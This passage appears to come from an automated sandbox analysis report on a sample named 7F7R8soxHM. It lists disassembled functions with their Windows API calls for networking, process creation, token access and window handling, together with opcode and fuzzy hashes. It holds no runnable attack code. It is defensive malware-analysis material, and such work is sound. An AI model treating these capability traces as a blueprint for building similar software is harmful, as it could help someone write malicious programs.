                      • HeapFree.KERNEL32(00000000), ref: 00EC8C4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                      • String ID:
                      • API String ID: 1592001646-0
                      • Opcode ID: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
                      • Instruction ID: 8cf7e3e6f6d5772c81ab074cac21265e4f679f0415cfe5236c66d3d1a92c83b1
                      • Opcode Fuzzy Hash: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
                      • Instruction Fuzzy Hash: 87218972E02208AFCB00CFA4CB44FEEB7B8EF50345F044099E454B7241DB32AA06CB61
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EE1A97
                        • Part of subcall function 00EE1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1B40
                        • Part of subcall function 00EE1B21: InternetCloseHandle.WININET(00000000), ref: 00EE1BDD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Internet$CloseConnectHandleOpen
                      • String ID:
                      • API String ID: 1463438336-0
                      • Opcode ID: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
                      • Instruction ID: 185d456bd715a15d2f5769c6638c5e3889e89623a03b266c119d5b459b802510
                      • Opcode Fuzzy Hash: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
                      • Instruction Fuzzy Hash: 84219235200649FFDB119F628C01FBAB7ADFF84701F10105EFA15A6690E771A855D790
                      APIs
                        • Part of subcall function 00ECF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF5BC
                        • Part of subcall function 00ECF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00ECF5E2
                        • Part of subcall function 00ECF5AD: lstrcmpiW.KERNEL32(00000000,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF613
                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE1DD
                      • lstrcpyW.KERNEL32(00000000,?), ref: 00ECE203
                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE237
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen
                      • String ID: cdecl
                      • API String ID: 4031866154-3896280584
                      • Opcode ID: 2a4ee87c5b55b027d51826aaabf213b2468a8df3e64b49367914d9b06fb24751
                      • Instruction ID: 91644fd818fba730444dac160a2afa4f513a8cb1637538fdbc3f8df09815e3c0
                      • Opcode Fuzzy Hash: 2a4ee87c5b55b027d51826aaabf213b2468a8df3e64b49367914d9b06fb24751
                      • Instruction Fuzzy Hash: 3711BE36200301EFCB29AF64D945F7A77A9FF84350B40602AF906DB260EB729852D7A0
                      APIs
                      • _free.LIBCMT ref: 00EA5351
                        • Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
                        • Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
                        • Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: f54c9353c708dd0cb7d2ca1c830547801f33b3655e8e3dbe24ce3ea2a555276f
                      • Instruction ID: 337e2544accc0a90beb4fedd72d7961bb8664d80515dfe2537dde9d8111a241c
                      • Opcode Fuzzy Hash: f54c9353c708dd0cb7d2ca1c830547801f33b3655e8e3dbe24ce3ea2a555276f
                      • Instruction Fuzzy Hash: B4112333505A15AFCF312F70AC0066E37D89F9A3A4B10242AF944BE1A0DEB1A9448790
                      APIs
                      • _memset.LIBCMT ref: 00E74560
                        • Part of subcall function 00E7410D: _memset.LIBCMT ref: 00E7418D
                        • Part of subcall function 00E7410D: _wcscpy.LIBCMT ref: 00E741E1
                        • Part of subcall function 00E7410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1
                      • KillTimer.USER32(?,00000001,?,?), ref: 00E745B5
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E745C4
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EAD6CE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                      • String ID:
                      • API String ID: 1378193009-0
                      • Opcode ID: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
                      • Instruction ID: 1780074d5415f6a2acb917b3103000da1cd7d1b844c5bdb3fa9dd1299542ca70
                      • Opcode Fuzzy Hash: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
                      • Instruction Fuzzy Hash: 6A21FCB0508784AFEB329B24DC45BE7BFEC9F45308F04509EE69E7A181C7746A84DB51
                      APIs
                        • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                        • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                      • gethostbyname.WSOCK32(?), ref: 00EE66AC
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE66B7
                      • _memmove.LIBCMT ref: 00EE66E4
                      • inet_ntoa.WSOCK32(?), ref: 00EE66EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 1504782959-0
                      • Opcode ID: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
                      • Instruction ID: 9deeabf45fc551a76e666c7953e4fb3df0e9dc96f33d005f903dc2f944e54f0d
                      • Opcode Fuzzy Hash: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
                      • Instruction Fuzzy Hash: 9B118E36900509AFCB04EBA1DD86DEEB7F8EF58310B049065F50AB7262DF70AE04CB61
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9043
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9055
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC906B
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9086
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
                      • Instruction ID: 52a5a02fb82f12a5797edcb8fa21fd6a16721776abbb8dcbe1b8658bb3c4ed20
                      • Opcode Fuzzy Hash: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
                      • Instruction Fuzzy Hash: 65114C79900218FFDB10DFA5C985FADBBB4FB48310F204095E904B7290D6726E11DB94
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
                      • GetClientRect.USER32(?,?), ref: 00EAB84B
                      • GetCursorPos.USER32(?), ref: 00EAB855
                      • ScreenToClient.USER32(?,?), ref: 00EAB860
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Client$CursorLongProcRectScreenWindow
                      • String ID:
                      • API String ID: 4127811313-0
                      • Opcode ID: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
                      • Instruction ID: 4a490ae2f993cd366a2e0a8bb42f429d662c0529e8e852a8fe77329bcabbf0b4
                      • Opcode Fuzzy Hash: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
                      • Instruction Fuzzy Hash: C4111935900159AFCB00DF98D8859FE77B8EF45300F408496F905F7252CB30AA55EBA5
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED166F
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED1694
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED169E
                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED16D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
                      • Instruction ID: 7787cb41bfc8abcf4d1cc1ea3798e7168670c49fa9eb33abc197964a1bd2bcd3
                      • Opcode Fuzzy Hash: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
                      • Instruction Fuzzy Hash: 6A113931C0152DEBCF009FE6D948AFEBB78FF49751F45509AEA50B6240CB3095A2CB96
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction ID: b6136a95f5af23fce13b0d06fae1371f4983b149cda7ecbe25758cad142063ba
                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                      • Instruction Fuzzy Hash: 3E01807204414ABBCF129E84CC019EE3F66BF5E345F099515FA9868031D337E9B1AB91
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00EFB59E
                      • ScreenToClient.USER32(?,?), ref: 00EFB5B6
                      • ScreenToClient.USER32(?,?), ref: 00EFB5DA
                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFB5F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
                      • Instruction ID: b19c38172bd36888543a3bc6f84a316730175087f2c69ae39602146f3663dfad
                      • Opcode Fuzzy Hash: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
                      • Instruction Fuzzy Hash: 931134B9D00209EFDB41CF99C4849EEBBB5FF48310F504166E915E2220D735AA55CF91
                      APIs
                      • _memset.LIBCMT ref: 00EFB8FE
                      • _memset.LIBCMT ref: 00EFB90D
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F37F20,00F37F64), ref: 00EFB93C
                      • CloseHandle.KERNEL32 ref: 00EFB94E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memset$CloseCreateHandleProcess
                      • String ID:
                      • API String ID: 3277943733-0
                      • Opcode ID: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
                      • Instruction ID: 83cf1456cf1aec3a6931ed2d78d6a75e202fc71439b4b5ae50c3f8b11118d16e
                      • Opcode Fuzzy Hash: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
                      • Instruction Fuzzy Hash: 71F0DAF2544318BBE6203775AC05FBB7A9DEB09764F005021FA08E5192D7755910D7E8
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 00ED6E88
                        • Part of subcall function 00ED794E: _memset.LIBCMT ref: 00ED7983
                      • _memmove.LIBCMT ref: 00ED6EAB
                      • _memset.LIBCMT ref: 00ED6EB8
                      • LeaveCriticalSection.KERNEL32(?), ref: 00ED6EC8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CriticalSection_memset$EnterLeave_memmove
                      • String ID:
                      • API String ID: 48991266-0
                      • Opcode ID: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
                      • Instruction ID: 71a6749e3f7c9f614699f36f4ca1e224e4eca9ba85cffa5621ba1eb93d4e5310
                      • Opcode Fuzzy Hash: 400254ced4662adef490ad8933421cf7d5e96d76aa45d0d696cb5ba667e8e46e
                      • Instruction Fuzzy Hash: CEF0543A100200AFCF016F55DC85A99BB69EF85320B049065FE086E22AC731E951CBB4
                      APIs
                        • Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                        • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
                        • Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
                        • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC030
                      • LineTo.GDI32(00000000,?,?), ref: 00EFC03D
                      • EndPath.GDI32(00000000), ref: 00EFC04D
                      • StrokePath.GDI32(00000000), ref: 00EFC05B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                      • String ID:
                      • API String ID: 1539411459-0
                      • Opcode ID: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
                      • Instruction ID: 095ee8933b9f40b772688442ce9267ab39932069e925b0bf164f9cd0c220fc92
                      • Opcode Fuzzy Hash: 067080e373d2dda4dd74a43ca16e2739d59c292570f22ec22b4bed89881c574e
                      • Instruction Fuzzy Hash: 5DF0BE3100125DBBDB122F55AC09FEE3F99AF0A320F148000FB11710E28B750555EB99
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
                      • GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
                      • AttachThreadInput.USER32(00000000), ref: 00ECA3BA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
                      • Instruction ID: dd050fefc485faeb8427f8ef12ad636959e578423c35f88b5a904dbf8f510812
                      • Opcode Fuzzy Hash: b0dbd144709f24fdbfd173297f1b03fa27852bef429e98a94b8908804bd8c79d
                      • Instruction Fuzzy Hash: 2AE01571541268BADB201FA2DD0CFEB3E1CEF167A5F048038F909E80A0CA72C955CBE0
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00E72231
                      • SetTextColor.GDI32(?,000000FF), ref: 00E7223B
                      • SetBkMode.GDI32(?,00000001), ref: 00E72250
                      • GetStockObject.GDI32(00000005), ref: 00E72258
                      • GetWindowDC.USER32(?,00000000), ref: 00EAC0D3
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAC0E0
                      • GetPixel.GDI32(00000000,?,00000000), ref: 00EAC0F9
                      • GetPixel.GDI32(00000000,00000000,?), ref: 00EAC112
                      • GetPixel.GDI32(00000000,?,?), ref: 00EAC132
                      • ReleaseDC.USER32(?,00000000), ref: 00EAC13D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                      • String ID:
                      • API String ID: 1946975507-0
                      • Opcode ID: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
                      • Instruction ID: cdc4b5e56def674db474657b274982c9e370e0f31661e06d79e4ea5e20999832
                      • Opcode Fuzzy Hash: 3ee9f22eb5cda2ffed2c37619824c9145cdb074c69be8ab7b911775504d32b39
                      • Instruction Fuzzy Hash: 10E06D32200244EEDF215FB5FC4D7E83B24EF5633AF108366FA69680E287724994DB12
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 00EC8C63
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C6A
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC882E), ref: 00EC8C77
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC882E), ref: 00EC8C7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
